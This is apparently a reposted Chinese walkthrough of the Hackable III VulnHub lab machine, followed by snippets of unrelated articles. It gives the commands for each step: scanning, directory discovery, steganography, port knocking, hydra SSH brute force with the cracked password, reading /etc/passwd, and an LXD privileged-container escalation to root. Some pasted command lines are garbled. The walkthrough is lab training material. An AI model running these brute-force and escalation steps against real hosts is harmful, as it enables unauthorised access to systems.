HACKABLE: III

news/2024/11/15 3:55:44/

文章目录

      • HACKABLE: III实战演练
          • 一、前期准备
            • 1、相关信息
          • 二、信息收集
            • 1、端口扫描
            • 2、访问网站
            • 3、查看网站源码
            • 4、扫描目录
            • 5、访问网址
            • 6、查看并下载
            • 7、访问网站
            • 8、查看文件
            • 9、解密
            • 10、访问网站
            • 11、访问网站
            • 12、查看文件
            • 13、解密
            • 14、访问网站
            • 15、访问网站
            • 16、下载图片
            • 17、隐写
            • 18、敲端口并端口扫描
            • 19、暴力破解
            • 20、远程连接
          • 三、后渗透
            • 1、查看文件
            • 2、查看文件
            • 3、切换用户
          • 四、提权
            • 1、提权
            • 2、访问目录

HACKABLE: III实战演练

一、前期准备
1、相关信息

靶机网站:https://www.vulnhub.com/entry/hackable-iii,720/

设备名称IP地址
靶机:Hackable III192.168.2.64
攻击机:kali192.168.2.22
二、信息收集
1、端口扫描
kali@kali:~$ nmap -A 192.168.2.64
# 开放WEB:80端口

在这里插入图片描述

2、访问网站
http://192.168.2.64

在这里插入图片描述

3、查看网站源码
# 发现用户名:jubiscleudo	邮箱:dev_suport@hackable3.com和登录界面

在这里插入图片描述

4、扫描目录
kali@kaliL:~$ sudo dirsearch -u "http://192.168.2.64/"

在这里插入图片描述

5、访问网址
http://192.168.2.64/backup/
# 发现一个Wordlist.txt

在这里插入图片描述

6、查看并下载
kali@kali:~$ wget "http://192.168.2.64/backup/wordlist.txt"

在这里插入图片描述

在这里插入图片描述

7、访问网站
http://192.168.2.64/config/
# 发现一个1.txt文件

在这里插入图片描述

8、查看文件
# 发现是Base64编码

在这里插入图片描述

9、解密

网址:https://base64.us/

在这里插入图片描述

10、访问网站
http://192.168.2.64/config.php 
# 查看源代码

在这里插入图片描述

11、访问网站
http://192.168.2.64/css/
# 发现2.txt

在这里插入图片描述

12、查看文件
# 发现是Brainfuck/Ook! 编码

在这里插入图片描述

13、解密

网址:https://tool.bugku.com/brainfuck/

# 将密文输入至文本框,点击BrainFuckToText

在这里插入图片描述

在这里插入图片描述

14、访问网站
http://192.168.2.64/login.php 
# 查看源代码,发现有一个3.jpg

在这里插入图片描述

15、访问网站
http://192.168.2.64/3.jpg
# 发现是一张图片

在这里插入图片描述

16、下载图片
kali@kali:~$ wget "http://192.168.2.64/3.jpg"

在这里插入图片描述

17、隐写
kali@kali:~$ steghide extract -sf 3.jpg
kali@kali:~$ cat steganopayload148505.txt

在这里插入图片描述

18、敲端口并端口扫描
# 通过搜集信息,寻找到了三个端口地址:10000,4444,65535,敲端口,发现22端口开放
kali@kali:~$ knock 192.168.2.64 10000 4444 65535
kali@kali:~$ nmap -A 192.168.2.64

在这里插入图片描述

19、暴力破解
kali@kali:~$ hydra -l jubiscleudo -P /home/kali/wordlist.txt 192.168.2.64 ssh
# 用户名:jubiscleudo	密码:onlymy

在这里插入图片描述

20、远程连接
kali@kali:~$ ssh jubiscleudo@192.168.2.64

在这里插入图片描述

三、后渗透
1、查看文件
# 在网站目录下发现新用户名
jubiscleudo@ubuntu20:/var/www/html$ cat .backup_config.php

在这里插入图片描述

2、查看文件
# 查看系统是否存在此用户名
jubiscleudo@ubuntu20:~$ cat /etc/passwd

在这里插入图片描述

3、切换用户
jubiscleudo@ubuntu20:/var/www/html$ su hackable_3

在这里插入图片描述

四、提权
1、提权

访问网址:https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

# 通过id显示,查找后发现lxd有相关提权方式,选择其中一种方法,
# build a simple alpine image
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686# import the image
lxc image import ./alpine*.tar.gz --alias myimage # It's important doing this from YOUR HOME directory on the victim machine, or it might fail.# before running the image, start and configure the lxd storage pool as default 
lxd init# run the image
lxc init myimage mycontainer -c security.privileged=true# mount the /root into the image
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true# interact with the container
lxc start mycontainer
lxc exec mycontainer /bin/sh
hackable_3@ubuntu20:~$ git clone https://github.com/saghul/lxd-alpine-builder
hackable_3@ubuntu20:~$ cd lxd-alpine-builder
hackable_3@ubuntu20:~$ sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-hackable_3@ubuntu20:~$ releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
hackable_3@ubuntu20:~$ sudo ./build-alpine -a i686
hackable_3@ubuntu20:~$ lxc image import ./alpine*.tar.gz --alias myimage
hackable_3@ubuntu20:~$ lxd init
hackable_3@ubuntu20:~$ lxc init myimage mycontainer -c security.privileged=true
hackable_3@ubuntu20:~$ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
hackable_3@ubuntu20:~$ lxc start mycontainer
hackable_3@ubuntu20:~$ lxc exec mycontainer /bin/sh

在这里插入图片描述

2、访问目录
# 在mnt下发现root

在这里插入图片描述

在这里插入图片描述


http://www.ppmy.cn/news/75700.html

相关文章

MySQL数据库基础4-内置函数

文章目录 日期函数字符串函数数学函数其他函数 日期函数 函数名称描述current date()当前日期current time()当前时间current timestamp()当前时间戳date(datetime)返回datetime参数的日期部分date add(date, interval d_value type)在date中添加日期或时间,interv…

新手如何学习挖漏洞?看这篇就够了【网络安全】

前言 有不少阅读过我文章的伙伴都知道,我从事网络安全行业已经好几年,积累了丰富的经验和技能。在这段时间里,我参与了多个实际项目的规划和实施,成功防范了各种网络攻击和漏洞利用,提高了安全防护水平。 也有很多小伙…

【react 全家桶】react-Hook(上)

本人大二学生一枚&#xff0c;热爱前端&#xff0c;欢迎来交流学习哦&#xff0c;一起来学习吧。 <专栏推荐> &#x1f525;&#xff1a;js专栏 &#x1f525;&#xff1a;vue专栏 &#x1f525;&#xff1a;react专栏 文章目录 14【react-Hook &#xff08;上&#x…

一些好用的软件推荐给你

软件一&#xff1a;nTrun nTrun 是一款非常实用的快速启动工具&#xff0c;它可以帮助用户快速启动各种常用的应用程序、网站和文件。此外&#xff0c;nTrun 还具有以下强大的功能&#xff1a; 自定义快捷键&#xff1a;用户可以根据自己的需求为每个应用程序、网站或文件设置…

Java实现天气预报功能

如果要实现类似百度天气、手机App这样的天气预报功能该如何实现&#xff1f;首先想到的是百度... 背景&#xff1a; 最近公司做了一个项目&#xff0c;天气预报的功能也做上去了&#xff0c;不仅有实时天气、未来7天预报的功能、还有气象预警的功能。 天气包括基本天气、白天夜…

【Tomcat】Tomcat多个版本存在信息泄漏漏洞

官方原文对于该漏洞的描述&#xff1a; When using the RemoteIpFilter with requests received from a reverse proxy via HTTP that include the X-Forwarded-Proto header set to https, session cookies created by Apache Tomcat 11.0.0-M1 to 11.0.0.-M2, 10.1.0-M1 to 1…

【k8s】centos7离线部署k8s集群方案二:搭建自主可控的软件仓库和镜像仓库(repo节点)

离线部署的两种方法&#xff1a; 方法一&#xff1a;直接将相关安装依赖包上传到各个节点方法二&#xff1a;搭建自主可控的软件仓库和镜像仓库&#xff08;repo节点&#xff09; 此篇主要记录方法二的实现步骤&#xff0c;参考思路如下&#xff1a; k8S之Centos离线安装_k8s离…

【密码学复习】第九讲 密钥管理(一)

密钥管理简介 • 柯克霍夫斯原则(Kerckhoffs Principle) 即使密码系统的任何细节已为人悉知&#xff0c;只要密钥未泄漏&#xff0c;它也应是安全的(19世纪). 密钥安全&#xff1a;三分技术&#xff0c;七分管理 密钥管理就是在授权各方之间实现密钥关系的建立和维护…